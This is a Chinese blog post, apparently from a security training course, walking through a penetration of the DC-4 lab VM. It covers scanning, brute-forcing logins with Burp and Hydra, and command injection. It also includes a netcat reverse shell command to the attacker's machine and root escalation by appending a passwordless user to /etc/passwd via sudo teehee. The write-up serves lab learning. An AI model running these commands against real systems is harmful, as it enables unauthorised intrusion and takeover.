网络安全实训第五天(主机系统渗透)

于 2024-08-19 09:12:03 发布
阅读量322 收藏 3
点赞数 9
分类专栏: 网络安全实训 文章标签: web安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44512510/article/details/141310412
版权

1 信息收集

  • 安装完成DC-4靶机后网络调成NAT模式,并运行

在这里插入图片描述


  • 在kali机中使用arp扫描获取靶机的IP
    命令:sudo arp-scan -l
    在这里插入图片描述

  • 根据获取到的IP打开网站

在这里插入图片描述


  • 使用nmap获取到靶机的服务和操作系统信息
    命令:sudo nmap -O -sV IP
    在这里插入图片描述

  • 使用dirsearch获取网站结构信息
    命令:sudo dirsearch -u IP

在这里插入图片描述


  • 可以使用AWVS对靶机IP进行扫描,查看相关信息

在这里插入图片描述


  • 可以查看到网站结构和漏洞信息

在这里插入图片描述


2 使用Burpsuite破解密码

  • 使用BP截获登录请求,转发到轰炸模块,高亮需要破解的内容,并设置载荷

在这里插入图片描述

  • 破解后查看报文长度判断成功状态,获取密码happy
    在这里插入图片描述

3 使用命令执行漏洞

  • 使用BP拦截Run请求,查看内容,发现执行的是radio的内容

在这里插入图片描述

  • 使用whoami查看权限

在这里插入图片描述


  • 使用pwd查看当前所在的目录

在这里插入图片描述

  • 对命令进行URL编码
    在这里插入图片描述

  • 将编码后的命令赋值给radio
    在这里插入图片描述

4 使用反弹shell技术

  • 在kali端监听1234端口
    命令:nc -lnvp 1234
    在这里插入图片描述

  • 查看kali机的IP地址
    在这里插入图片描述

  • 对命令进行编码操作
    命令:nc IP 1234 -e /bin/sh

在这里插入图片描述


  • 赋值给radio并发送建立连接
    在这里插入图片描述

  • 返回kali端查看连接状态
    在这里插入图片描述

  • 使用python建立真正的shell访问终端
    命令:python -c ‘import pty;pty.spawn(“/bin/bash”)’在这里插入图片描述


5 使用Hydra协议爆破技术

  • 进入到jim用户的backups目录下,查看到存在old-passwords.bak文件

在这里插入图片描述


  • 将bak文件下载到kali机中
    命令:python -m SimpleHTTPServer

在这里插入图片描述


  • 访问IP:8000,下载文件

在这里插入图片描述


  • 使用Hydra爆破密码
    命令:
sudo hydra -l jim -P old-passwords.bak ssh://IP -vV

在这里插入图片描述


  • 获取到jim的密码:jibril04

在这里插入图片描述


6 使用SSH登录系统

  • 使用ssh登录到jim
    命令:ssh jim@IP
    在这里插入图片描述

  • 查看用户目录下的mbox文件
    在这里插入图片描述

  • 查看/var/mail/jim文件内容获取到charles的密码:^xHhA&hvim0y

在这里插入图片描述


  • 使用su登录用户charles
    在这里插入图片描述

7 使用提权技术

  • 进入到charles用户后使用sudo查看不需要密码就可以执行的命令
    在这里插入图片描述

  • 使用命令添加用户wjr,并使用su登录
    命令:
echo ‘wjr::0:0:wjr,,,:/home/wjr:/bin/bash’ | sudo teehee -a /etc/passwd

在这里插入图片描述


  • 具体参数解释如下

在这里插入图片描述


8 获取flag值

  • 成功获取到/root文件夹中flag.txt中的内容

在这里插入图片描述

Wrop
关注
  • 9
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全攻防渗透测试实训笔记
m0_65385236的博客
04-07 1354
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
网络渗透实训笔记
m0_65456295的博客
04-06 1021
Burp Suite 学习目标 1. Burpsuite配置及代理设置 2. Burpsuit功能模块讲解 3. Burpsuite实战 标题 主机信息收集技术— Nmap 扫描器之王 标题 主机信息收集技术— Nmap namp 192.168.1.1 namp -A –T4 -v 192.168.1.1 -A 开启操作系统识别和版本识别功能...
网络安全实训Day15
Yisitelz的博客
04-26 599
第十五天笔记。渗透测试概述、流程;信息收集技术。
安全学习】-网络安全靶场实训演练系统建设方案
qq_53058639的博客
01-24 1052
第1章需求分析1.1建设需求1.2建设目标与内容第2章系统整体建设2.1设计思想2.2建设目标2.3架构设计2.4系统设计2.4.1基础平台系统设计2.4.2实训系统设计2.4.3考核分系统设计2.4.4拓扑设计分系统设计2.4.5模拟仿真系统设计2.4.5.1网络仿真2.4.5.2安全仿真2.4.5.3系统监控2.4.5.4日志管理第3章主要功能及性能指标3.1基础平台系统3.2实训系统3.3考核分系统3.4拓扑设计分系统3.5模拟仿真分系统
网络安全实训Day16
Yisitelz的博客
04-26 2579
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
实训第三天 靶站点渗透实践
qq_69439879的博客
04-17 1073
其中一个更大的优势在于由于phpMyAdmin跟其他PHP程序一样在网页服务器上执行,但是您可以在任何地方使用这些程序产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。具体来说,开发人员为了方便起见,会将经常使用的函数或代码封装在一个单独的文件中,并在需要时直接调用该文件。利用文件包含漏洞的方法有多种,例如利用包含漏洞将用户上传的恶意代码由包含函数加载并执行,或者向Web日志中插入恶意代码并通过文件包含漏洞执行。使用安全的编程实践和框架来减少漏洞的可能性等。
脚本攻击、后渗透攻击(网安全实训第四天)
分享观点和经验,欢迎交流。
06-09 873
1.通过脚本快速攻击 2.后渗透攻击续 1.通过脚本快速攻击 我们可以通过msfconsole -x “msfconsole内输入的命令”实现快速攻击,进一步,我们可以将攻击需要执行的命令写成脚本,进行攻击。 (1)编辑脚本 vi abin.rc 输入以下内容。(根据实际情况修改) use exploit/windows/smb/ms08_067_netapi set RHOST...
网络安全行业名词_失陷主机(1)
2401_84264662的博客
04-29 1364
就是在图片中隐藏一句话木马。利用.htaccess解析图片 [1] 为PHP或者asp文件。达到执行图片内代码目的。制作方式即针对系统漏洞的特征编写的识别验证工具。
电子商务网站网络安全实训任务书.doc
06-21
基于电子商务网站网络安全实训任务书,以下是从标题、描述、标签和部分内容中生成的相关知识点: 一、网络安全管理 * 网络安全隐患分析:对现有网站规划书中的网络安全隐患进行分析和识别 * 安全规划设计:根据...
国家开放大学 网络操作系统管理 形考任务5 配置DNS服务实训
04-11
### 国家开放大学网络操作系统管理形考任务5:配置DNS服务实训 #### 实训目的与背景 本次实训旨在帮助学员深入理解DNS服务的工作原理,并掌握如何在Windows Server 2022环境下配置DNS服务器及客户端的具体操作流程...
第9章计算机网络安全实训问题.ppt
11-21
【第9章 计算机网络安全实训问题】 在计算机网络安全领域,实训是提升技能和理解理论知识的关键。本章的实训旨在通过一系列实践活动,帮助学生深入理解和应用网络安全概念,增强实战能力。实训内容覆盖了远程攻击...
网络安全技术实训指导
12-11
网络安全技术实训指导
网络安全实训室建设实践与思考.pdf
09-20
下面是从网络安全实训室建设的目的和意义、建设思路与建设目标、网络安全实训室建设实施等方面对高职院校网络安全实训室建设中的有关问题进行了分析与探讨。 网络安全实训室建设的目的和意义 网络安全技术已经渗透...
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 851
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
漏洞扫描的重要性,如何做好漏洞扫描服务
dexunyun的博客
08-15 818
总之,系统漏洞扫描是守护网络安全的重要防线之一。通过漏洞扫描VSS,丰富的漏洞规则库,可针对各种类型的网站进行全面深入的漏洞扫描,提供专业全面的扫描报告。德迅云安全可以提供有效应对网络安全威胁的解决方案,为用户网络安全提供安全保障。
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 198
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
安全入门day.02
mxxcxy的博客
08-14 1046
这里使用小皮面板部署网页(1)点击安装程序开始安装,在自定义选项中修改安装位置,根据自己实际安装位置设定,作者这里安装在C盘作为演示(2)点击立即安装,等待进度条走完(3)点击安装完成执行程序(4)如果出现以下界面就是安装成功了(5)根据设定的软件安装位置,部署网站,软件根目录下面有3个文件夹,第一个COM文件夹是小皮面板的配置文件,第二个Extensions文件夹是存放已经安装的软件环境,例如php、mysql和Apache等;
入门网络安全工程师要学习哪些内容
最新发布
白帽子佳奇的博客
08-18 1165
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值